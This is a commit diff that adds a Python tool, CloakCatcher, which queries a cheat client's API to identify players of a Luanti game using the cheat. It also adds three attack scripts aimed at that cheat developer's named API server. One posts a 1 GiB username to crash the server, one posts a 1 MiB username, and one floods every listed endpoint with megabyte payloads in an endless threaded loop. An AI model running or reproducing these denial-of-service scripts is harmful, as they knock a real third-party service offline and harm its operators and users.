add the scripts

cloakcatcher/Makefile

@@ -0,0 +1,17 @@
+all_linux:
+
+	sudo apt install python3 python3-requests python3-pip -y
+	pip3 install pyinstaller --break-system-packages
+	python3 -m PyInstaller -F -n"CloakCatcher" main.py
+	mkdir -p bin/
+	mv -f dist/CloakCatcher bin/
+	cp -f cloakcatcher.conf bin/
+	
+clean:
+
+	rm -rf dist/ build/ __pycache__/ CloakCatcher.spec
+	
+reset:
+
+	rm -rf bin/
+	echo "" > cloakcatcher.conf

cloakcatcher/README.md

@@ -0,0 +1,51 @@
+# CloakCatcher
+## version 1.4.1
+CloakCatcher is a small program written in Python 3 to identify users of the **CloakV4 cheat client**:
+[Website](https://cloak-v4.web.app/)
+[GitHub](https://github.com/TeamAcedia/CloakV4/)
+
+**Do not share this script with anyone.** If a CloakV4 developer gets their hands on this script, it's useless. (lol nvm)
+## Usage:
+### Windows:
+Install [Python 3](https://python.org/downloads/windows/)
+**Make sure to select the option to install pip**
+Then open Command Prompt and run:
+`pip3 install requests`
+
+To run the script, open the folder that contains the script in Command Prompt and run:
+`python cloakcatcher.py`
+
+To compile it to a Windows Executable (.exe):
+Open Command Prompt in the folder CloakCatcher is in, and run:
+`pip3 install pyinstaller`
+followed by:
+`python -m PyInstaller -Fn"CloakCatcher" cloakcatcher.py`
+The executable is located in `dist\`. You can copy this file anywhere you like and remove the remaining files.
+
+### Linux (Debian and Ubuntu, maybe Mint):
+Install **Python 3**:
+Run `sudo apt install python3` in Terminal
+Run `sudo apt install python3-requests` in Terminal
+or 
+`pip3 install requests --break-system-packages` in Terminal
+
+To run the script:
+Open Terminal in the folder CloakCatcher is in, and run:
+`python3 cloakcatcher.py`
+
+To compile it to an executable file:
+Run `make`.
+The executable is located in `bin/`. You can copy this file anywhere you like and remove the remaining files.
+To remove files created during build time that are not needed:
+Run `make clean`
+To restore CloakCatcher's source code to the original state:
+Run `make clean && make reset`
+This will remove build files and executables, and clear the configuration file.
+### MacOS/iOS/Android:
+go get a real pc and chuck your current device out the window
+## Config file:
+The config file (`bin/cloakcatcher.conf`) stores configuration for CloakCatcher.
+Here is the proper syntax of it:
+{"cloakv4_username": "<Your CloakV4 username>", "cloakv4_password": "<Your CloakV4 password>", "server_ip": "<Server IP to scan>", "server_port": "<Server port to scan>", "serverlist_url": "<Serverlist URL>"}
+serverlist_url should be set to "http://servers.luanti.org/list" unless you are targeting a specific list, **don't edit this unless you know what you are doing.**
+**If you are using a compiled version, edit `bin/cloakcatcher.conf` (created at buildtime). If you are directly running the script without compiling, edit `cloakcatcher.conf`**

cloakcatcher/cloakcatcher.conf

@@ -0,0 +1 @@
+

cloakcatcher/extract_config.py

@@ -0,0 +1,35 @@
+# extract_config.py
+# Made by user333_
+# Meant to be included with main.py
+
+from ast import literal_eval
+from sys import exit
+
+CONFIG_FILE = "cloakcatcher.conf"
+
+def extract_config() -> dict:
+	
+	try:
+		
+		with open(CONFIG_FILE, "r") as f:
+			
+			config_data = f.read().strip()
+		
+		config = literal_eval(config_data)
+		restructured_config = {
+							  "username":       config["cloakv4_username"],
+							  "passwd":         config["cloakv4_password"],
+							  "address":        config["server_ip"],
+							  "port":           config["server_port"],
+							  "serverlist_url": config["serverlist_url"]}
+		return restructured_config
+	
+	except Exception as e:
+		
+		print(f"[WARNING] {CONFIG_FILE} is empty, missing, or incorrectly structured.")
+		return {}
+		
+if __name__ == "__main__":
+	
+	raise Exception("[ERROR] You ran the wrong script, run main.py instead.")
+	exit(1)

cloakcatcher/fetch_data.py

@@ -0,0 +1,42 @@
+# fetch_data.py
+# Made by user333_
+# Meant to be included with main.py
+
+from requests import post, get
+from sys import exit
+
+def fetch_data(url: str, json: dict, request_type: str) -> dict:
+
+	if request_type == "post":
+	
+		try:
+			
+			data = post(url = url, json = json)
+			return data.json()
+
+		except Exception as e:
+			
+			NetworkError(e)
+	
+	if request_type == "get":
+		
+		try:
+			
+			data = get(url = url)
+			return data.json()
+			
+		except Exception as e:
+			
+			NetworkError(e)
+			
+def NetworkError(e: str):
+
+	raise Exception(f"""[ERROR] Error 1: An exception occured while attempting to fetch data.
+This could be a result of an invalid request, no network connection, or the server is offline.
+Exception: {e}""")
+	exit(1)
+	
+if __name__ == "__main__":
+
+	raise Exception("[ERROR] You ran the wrong script, run main.py instead.")
+	exit(1)

cloakcatcher/handle_input.py

@@ -0,0 +1,87 @@
+# handle_input.py
+# Made by user333_
+# Meant to be included with main.py
+
+from extract_config import extract_config
+from sys import exit
+
+def handle_input() -> dict:
+	
+	try:
+		
+		print("Welcome to CloakCatcher v1.4.1")
+		
+		prompt = None
+		
+		while prompt not in ["", "1", "2"]:
+
+			print("Select a function:\n")
+			print("1. Scan an individual server for CloakV4 users (default)")
+			print("2. Scan all servers for CloakV4 users")
+			
+			prompt = input("\nSelect (1-2): ").strip()
+		
+		config = extract_config()
+		
+		if prompt == "1" or prompt == "":
+
+			if config != {}:
+				
+				username: str = input("CloakV4 username (press enter for default): "      ).strip() or config["username"]
+				passwd:   str = input("CloakV4 password (press enter for default): "      ).strip() or config["passwd"]
+				address:  str = input("IP of server to scan (press enter for default): "  ).strip() or config["address"]
+				port:	  str = input("Port of server to scan (press enter for default): ").strip() or config["port"]
+				
+			else:
+				
+				username: str = input("CloakV4 username: "      ).strip()
+				passwd:   str = input("CloakV4 password: "      ).strip()
+				address:  str = input("IP of server to scan: "  ).strip()
+				port:	  str = input("Port of server to scan: ").strip()
+			
+			new_config = {
+						 "username":       username,
+						 "passwd":         passwd,
+						 "address":        address,
+						 "port":           port,
+						 "serverlist_url": ""
+						 }
+						
+			return new_config
+		
+		if prompt == "2":
+			
+			if config != {}:
+				
+				username: str = input("CloakV4 username (press enter for default): ").strip() or config["username"]
+				passwd:   str = input("CloakV4 password (press enter for default): ").strip() or config["passwd"]
+				servlist: str = input("Serverlist URL (press enter for default): "  ).strip() or config["serverlist_url"]
+				
+			else:
+				
+				username: str = input("CloakV4 username: ").strip()
+				passwd:   str = input("CloakV4 password: ").strip()
+				servlist: str = input("Serverlist URL (press enter for default serverlist): ").strip() or "http://servers.luanti.org/list"
+				
+			new_config = {
+						 "username":       username,
+						 "passwd":         passwd,
+						 "address":        "all",
+						 "port":           "all",
+						 "serverlist_url": servlist
+						 }
+
+			return new_config
+			
+		else:
+			
+			print ("Invalid response.")
+				
+	except Exception:
+		
+		raise Exception("[ERROR] Invalid configuration.")
+		exit(1)
+
+if __name__ == "__main__":
+	
+	raise Exception("[ERROR] You ran the wrong script, run main.py instead.")

cloakcatcher/hash_data.py

@@ -0,0 +1,26 @@
+# hash_data.py
+# Made by user333_
+# Meant to be included with main.py
+
+from hashlib import sha256
+from sys import exit
+
+def hash_data(data: str) -> str:
+
+	try:
+	
+		data = data.encode()
+		h = sha256()
+		h.update(data)
+		hashed_data = h.hexdigest()
+		return hashed_data
+	
+	except Exception:
+		
+		raise Exception(f"[ERROR] Failed to hash binary data '{data}'")
+		exit(1)
+
+if __name__ == "__main__":
+
+	raise Exception("[ERROR] You ran the wrong script, run main.py instead.")
+	exit(1)

cloakcatcher/main.py

@@ -0,0 +1,133 @@
+# CloakCatcher v1.4.1
+# Made by user333_
+
+print(r"""
+   ___ _             _      ___      _       _
+  / __\ | ___   __ _| | __ / __\__ _| |_ ___| |__   ___ _ __
+ / /  | |/ _ \ / _` | |/ // /  / _` | __/ __| '_ \ / _ \ '__|
+/ /___| | (_) | (_| |   </ /__| (_| | || (__| | | |  __/ |
+\____/|_|\___/ \__,_|_|\_\____/\__,_|\__\___|_| |_|\___|_|
+""")
+
+from fetch_data import fetch_data
+from hash_data import hash_data
+from handle_input import handle_input
+
+from sys import exit, stdout
+
+config = handle_input()
+
+USERNAME = config["username"]
+PASSWD   = config["passwd"]
+ADDRESS  = config["address"]
+PORT     = config["port"]
+SERVLIST = config["serverlist_url"]
+
+url         = "http://teamacedia.baselinux.net:22222/" # DO NOT EDIT (unless TeamAcedia changes their server)
+login_url   = "api/login/"				 			   #
+players_url = "api/server/players/"					   #
+
+def main() -> None:
+	
+	CloakCatcher.main()
+
+class CloakCatcher:
+
+	def main() -> None:
+
+		try:
+
+			if ADDRESS == "all" and PORT == "all": # Full serverlist scan mode.
+
+				CloakCatcher.full_serverlist()
+
+			else: # Single-server scan mode.
+
+				CloakCatcher.single_server()
+
+		except KeyboardInterrupt:
+
+			print("Exiting...")
+			exit(0)
+
+	def single_server() -> None:
+
+		while True:
+
+			hashed_passwd  = hash_data(PASSWD)
+			session_token  = fetch_data(url + login_url,   {
+															"username": USERNAME,
+															"password": hashed_passwd
+															},
+															"post")["session_token"]
+			players_on_cv4 = fetch_data(url + players_url, {
+															"token": session_token,
+															"server_address": ADDRESS,
+															"server_port": PORT
+															},
+															"post")["players"]
+
+			if len(players_on_cv4) > 0:
+
+				print("\nPlayers detected on CloakV4:\n")
+
+				for n in range(0, len(players_on_cv4)):
+
+					print(f"Playername: \"{players_on_cv4[n]['joined_name']}\", CloakV4 username: \"{players_on_cv4[n]['username']}\"")
+
+			else:
+
+				print("No players detected on CloakV4.")
+
+			input("\nPress Enter to refresh.\nPress [Ctrl + C] to exit.\n")
+			print(f"{'*'*80}\n") # Nicer-looking in code than typing 80 asteriks, but slightly less readable
+
+	def full_serverlist() -> None:
+
+		while True:
+
+			servers = fetch_data(SERVLIST, {}, "get")["list"]
+
+			count = 0
+			skipped = 0
+
+			for server in servers:
+
+				if server["clients"] > 0:
+
+					count += 1
+					hashed_passwd = hash_data(PASSWD)
+					session_token = fetch_data(url + login_url,    {
+																	"username": USERNAME,
+																	"password": hashed_passwd
+																   },
+																	"post")["session_token"]
+
+					players_on_cv4 = fetch_data(url + players_url, {
+																	"token": session_token,
+																	"server_address": server["address"],
+																	"server_port": str(server["port"])
+																	},
+																	"post")["players"]
+
+					stdout.write("\r[" + "|/-\\"[count % 4] + f"] Scanned {count}/{len(servers)} servers. Skipped {skipped} servers.") # Why does python care if i have a backslash in an f-string...
+
+					if len(players_on_cv4) > 0:
+
+						for n in range(0, len(players_on_cv4)):
+
+							print("\n\nPlayers detected on CloakV4:")
+							print(f"Server: \"{server['name']}\" ({server['address']}:{server['port']})")
+							print(f"Playername: \"{players_on_cv4[n]['joined_name']}\", CloakV4 username: \"{players_on_cv4[n]['username']}\"\n")
+
+				else:
+
+					skipped += 1
+					stdout.write("\r[" + "|/-\\"[count % 4] + f"] Scanned {count}/{len(servers)} servers. Skipped {skipped} servers.") # See line #63, comment.
+
+			input("\n\nPress Enter to refresh.\nPress [Ctrl + C] to exit.\n")
+			print(f"{'*'*80}\n")
+
+if __name__ == "__main__":
+
+	main()

crash_server/main.py

@@ -0,0 +1,25 @@
+#!/bin/python3
+
+import requests
+import hashlib
+
+PASSWORD = '0'
+USERNAME = '0'*1024*1024*1024
+
+API_URL = "https://teamacedia.baselinux.net:22222/"
+ENDPOINT_REGISTER = "/api/register"
+
+def main() -> int:
+    response = requests.post(
+        url = API_URL + ENDPOINT_REGISTER,
+        json = {
+            "username": USERNAME,
+            "password": PASSWORD
+        }
+    )
+
+    print(response.status_code)
+    return 0 if response.status_code == 200 else 1
+
+if __name__ == '__main__':
+    exit(main())

million_zero_username/main.py

@@ -0,0 +1,32 @@
+#!/bin/python3
+
+import requests
+import hashlib
+
+PASSWORD = '0'
+USERNAME = '0'*1024*1024
+
+API_URL = "https://teamacedia.baselinux.net:22222/"
+ENDPOINT_REGISTER = "/api/register"
+
+def hash_pw(pw: str) -> str:
+    h = hashlib.sha256()
+    h.update(pw.encode())
+    return h.hexdigest()
+
+def main() -> int:
+    pw = hash_pw(PASSWORD)
+
+    response = requests.post(
+        url = API_URL + ENDPOINT_REGISTER,
+        json = {
+            "username": USERNAME,
+            "password": pw
+        }
+    )
+
+    print(response.status_code)
+    return 0 if response.status_code == 200 else 1
+
+if __name__ == '__main__':
+    exit(main())

spam_requests/main.py

@@ -0,0 +1,41 @@
+import requests, time, _thread
+
+API_URL = "http://teamacedia.baselinux.net:22222"
+
+ENDPOINTS = [
+    "/api/register",
+    "/api/login",
+    "/api/verify-session",
+    "/api/server/join",
+    "/api/server/leave",
+    "/api/server/players",
+    "/api/cosmetics/capes",
+    "/api/users/capes",
+    "/api/users/capes/set_selected",
+    "/api/users/capes/get_selected",
+    "/api/users/get_all",
+    "/api/rewards/create",
+    "/api/rewards/update",
+    "/api/rewards/delete",
+    "/api/rewards/get_all",
+    "/api/rewards/redeem"
+]
+
+def spam_endpoint(endpoint: str) -> None:
+    response = requests.post(
+        url = API_URL + endpoint,
+        json = {
+            "0": "0"*1024*1023
+        }
+    )
+
+    print(f"{endpoint} returned status code {response.status_code}")
+
+def main() -> None:
+    while True:
+        for endpoint in ENDPOINTS:
+            time.sleep(0.005)
+            _thread.start_new_thread(spam_endpoint, (endpoint,))
+
+if __name__ == "__main__":
+    main()